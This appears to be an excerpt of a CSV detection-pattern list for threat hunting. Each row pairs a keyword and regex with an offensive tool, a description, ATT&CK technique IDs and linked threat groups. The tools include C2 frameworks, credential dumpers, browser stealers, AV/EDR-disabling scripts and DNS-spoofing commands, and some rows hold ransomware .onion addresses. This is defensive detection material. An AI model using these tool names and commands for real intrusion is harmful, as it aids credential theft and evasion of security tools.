"*dllinject *",".{0,1000}dllinject\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","41120"
"*dllinject.py*",".{0,1000}dllinject\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","41121"
"*DllInjection.dll*",".{0,1000}DllInjection\.dll.{0,1000}","offensive_tool_keyword","Ikeext-Privesc","Windows IKEEXT DLL Hijacking Exploit Tool","T1546.011 - T1574.009 - T1036.004","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/securycore/Ikeext-Privesc","1","0","N/A","N/A","10","1","33","52","2018-02-25T13:45:15Z","2018-02-27T11:18:56Z","41122"
"*-DllInjection.ps1*",".{0,1000}\-DllInjection\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1138","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","41123"
"*DllInstall is used when executing the Merlin agent with regsvr32.exe*",".{0,1000}DllInstall\sis\sused\swhen\sexecuting\sthe\sMerlin\sagent\swith\sregsvr32\.exe.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","41124"
"*dllKitten.dll*",".{0,1000}dllKitten\.dll.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","41125"
"*DllLdr.x64.bin*",".{0,1000}DllLdr\.x64\.bin.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","41126"
"*Dll-Loader -http -path *",".{0,1000}Dll\-Loader\s\-http\s\-path\s.{0,1000}","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","Turla","Exploitation tool","https://github.com/Hackplayers/evil-winrm","1","0","N/A","N/A","10","10","4804","626","2024-12-02T08:52:41Z","2019-05-28T10:53:00Z","41127"
"*Dll-Loader -local -path*",".{0,1000}Dll\-Loader\s\-local\s\-path.{0,1000}","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","Turla","Exploitation tool","https://github.com/Hackplayers/evil-winrm","1","0","N/A","N/A","10","10","4804","626","2024-12-02T08:52:41Z","2019-05-28T10:53:00Z","41128"
"*Dll-Loader -smb -path *",".{0,1000}Dll\-Loader\s\-smb\s\-path\s.{0,1000}","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","Turla","Exploitation tool","https://github.com/Hackplayers/evil-winrm","1","0","N/A","N/A","10","10","4804","626","2024-12-02T08:52:41Z","2019-05-28T10:53:00Z","41129"
"*DllLoaderLoader.exe*",".{0,1000}DllLoaderLoader\.exe.{0,1000}","offensive_tool_keyword","Ebowla","Framework for Making Environmental Keyed Payloads","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/Genetic-Malware/Ebowla","1","1","N/A","N/A","10","8","748","171","2019-01-28T10:45:15Z","2016-04-07T22:29:58Z","41130"
"*-DllName *-Module *",".{0,1000}\-DllName\s.{0,1000}\-Module\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","41131"
"*DllNotificationInjection.cpp*",".{0,1000}DllNotificationInjection\.cpp.{0,1000}","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.","T1055.011 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ShorSec/DllNotificationInjection","1","1","N/A","N/A","10","1","23","3","2023-08-23T13:50:27Z","2023-12-01T12:47:43Z","41132"
"*DllNotificationInjection.exe*",".{0,1000}DllNotificationInjection\.exe.{0,1000}","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.","T1055.011 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ShorSec/DllNotificationInjection","1","1","N/A","N/A","10","1","23","3","2023-08-23T13:50:27Z","2023-12-01T12:47:43Z","41133"
"*DllNotificationInjection.sln*",".{0,1000}DllNotificationInjection\.sln.{0,1000}","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.","T1055.011 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ShorSec/DllNotificationInjection","1","1","N/A","N/A","10","1","23","3","2023-08-23T13:50:27Z","2023-12-01T12:47:43Z","41134"
"*DllNotificationInjection.vcxproj*",".{0,1000}DllNotificationInjection\.vcxproj.{0,1000}","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.","T1055.011 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ShorSec/DllNotificationInjection","1","1","N/A","N/A","10","1","23","3","2023-08-23T13:50:27Z","2023-12-01T12:47:43Z","41135"
"*DllNotificationInjection-master*",".{0,1000}DllNotificationInjection\-master.{0,1000}","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.","T1055.011 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ShorSec/DllNotificationInjection","1","1","N/A","N/A","10","1","23","3","2023-08-23T13:50:27Z","2023-12-01T12:47:43Z","41136"
"*dllproxy.py*",".{0,1000}dllproxy\.py.{0,1000}","offensive_tool_keyword","DllProxy","Proxy your dll exports and add some spicy content at the same time","T1574.002 - T1036.005","TA0005 - TA0004","N/A","N/A","Exploitation tool","https://github.com/Iansus/DllProxy/","1","1","N/A","N/A","N/A","1","17","5","2023-06-28T14:19:36Z","2021-05-04T19:38:42Z","41137"
"*DllProxy-main*",".{0,1000}DllProxy\-main.{0,1000}","offensive_tool_keyword","DllProxy","Proxy your dll exports and add some spicy content at the same time","T1574.002 - T1036.005","TA0005 - TA0004","N/A","N/A","Exploitation tool","https://github.com/Iansus/DllProxy/","1","1","N/A","N/A","N/A","1","17","5","2023-06-28T14:19:36Z","2021-05-04T19:38:42Z","41138"
"*dllsearcher *.dll*",".{0,1000}dllsearcher\s.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","41139"
"*-dll-sideload=*.dll*",".{0,1000}\-dll\-sideload\=.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","41140"
"*DLL-Spoofer-main*",".{0,1000}DLL\-Spoofer\-main.{0,1000}","offensive_tool_keyword","DLL-Spoofer","POC for a DLL spoofer to determine DLL Hijacking","T1574.002","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/MitchHS/DLL-Spoofer","1","1","N/A","N/A","9","1","60","7","2025-03-04T14:14:15Z","2023-10-18T14:34:38Z","41141"
"*dlyo7r3n4qy5fzv4645nddjwarj7wjdd6wzckomcyc7akskkxp4glcad.onion*",".{0,1000}dlyo7r3n4qy5fzv4645nddjwarj7wjdd6wzckomcyc7akskkxp4glcad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","41142"
"*dmcxblue/SharpBlackout*",".{0,1000}dmcxblue\/SharpBlackout.{0,1000}","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpBlackout","1","1","N/A","N/A","10","1","83","20","2025-03-21T16:33:42Z","2023-08-23T14:16:40Z","41143"
"*dmFsaWRfdXNlckBjb250b3NvLmNvbTpQYXNzd29yZDE*",".{0,1000}dmFsaWRfdXNlckBjb250b3NvLmNvbTpQYXNzd29yZDE.{0,1000}","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tool","https://github.com/gremwell/o365enum","1","0","N/A","N/A","7","3","267","39","2024-05-02T07:45:31Z","2020-02-18T12:22:50Z","41144"
"*dmg2john.py*",".{0,1000}dmg2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","41145"
"*dmluY2VudC5sZXRvdXhAZ21haWwuY29t*",".{0,1000}dmluY2VudC5sZXRvdXhAZ21haWwuY29t.{0,1000}","offensive_tool_keyword","BetterSafetyKatz","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#base64","BetterSafetyKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","41146"
"*dmluY2VudC5sZXRvdXhAZ21haWwuY29t*",".{0,1000}dmluY2VudC5sZXRvdXhAZ21haWwuY29t.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#base64","BetterSafetyKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","41147"
"*dnefedniw  eteled cs*",".{0,1000}dnefedniw\s\seteled\scs.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection  - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","41149"
"*DNet-EnumerateAllDomainUserAccounts*",".{0,1000}DNet\-EnumerateAllDomainUserAccounts.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","41151"
"*DNet-ListAccountsByDescription*",".{0,1000}DNet\-ListAccountsByDescription.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","41152"
"*DNet-ListDomainUserAccountsWithCompletedADDescription*",".{0,1000}DNet\-ListDomainUserAccountsWithCompletedADDescription.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","41153"
"*DNet-ListUsersInDomainAdminsGroup*",".{0,1000}DNet\-ListUsersInDomainAdminsGroup.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","41154"
"*dnf install tor -y*",".{0,1000}dnf\sinstall\stor\s\-y.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","0","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","41157"
"*dngmlblcodfobpdpecaadgfbcggfjfnm*",".{0,1000}dngmlblcodfobpdpecaadgfbcggfjfnm.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","41158"
"*dnpscnbaix6nkwvystl3yxglz7nteicqrou3t75tpcc5532cztc46qyd.onion*",".{0,1000}dnpscnbaix6nkwvystl3yxglz7nteicqrou3t75tpcc5532cztc46qyd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","41159"
"*DNS retrieval done - converting to file*",".{0,1000}DNS\sretrieval\sdone\s\-\sconverting\sto\sfile.{0,1000}","offensive_tool_keyword","dnskire","A tool for file infiltration over DNS","T1071.004 - T1071.001 - T1048","TA0010 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/0xtosh/dnskire","1","0","N/A","N/A","7","1","17","0","2023-12-07T21:42:34Z","2022-09-10T17:56:30Z","41160"
"*dns.lexfo.fr*",".{0,1000}dns\.lexfo\.fr.{0,1000}","offensive_tool_keyword","sshimpanzee","SSHD Based implant supporting tunneling mecanisms to reach the C2 (DNS - ICMP - HTTP Encapsulation - HTTP/Socks Proxies - UDP","T1572 - T1095 - T1090 - T1043","TA0010 - TA0011 - TA0005","N/A","Scattered Spider*","C2","https://github.com/lexfo/sshimpanzee","1","0","N/A","N/A","10","10","263","27","2025-03-05T08:32:56Z","2023-04-03T10:11:27Z","41161"
"*dns.msfncsi.com*",".{0,1000}dns\.msfncsi\.com.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","1","N/A","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","41162"
"*dns.spoof on*",".{0,1000}dns\.spoof\son.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 -  BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","0","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","41163"
"*dns.spoof.address*",".{0,1000}dns\.spoof\.address.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 -  BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","1","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","41164"
"*dns.spoof.all*",".{0,1000}dns\.spoof\.all.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 -  BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","1","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","41165"
"*dns.spoof.domains*",".{0,1000}dns\.spoof\.domains.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 -  BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","1","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","41166"
"*dns.spoof.hosts*",".{0,1000}dns\.spoof\.hosts.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 -  BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","1","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","41167"
"*dns_beacon_beacon*",".{0,1000}dns_beacon_beacon.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","41168"
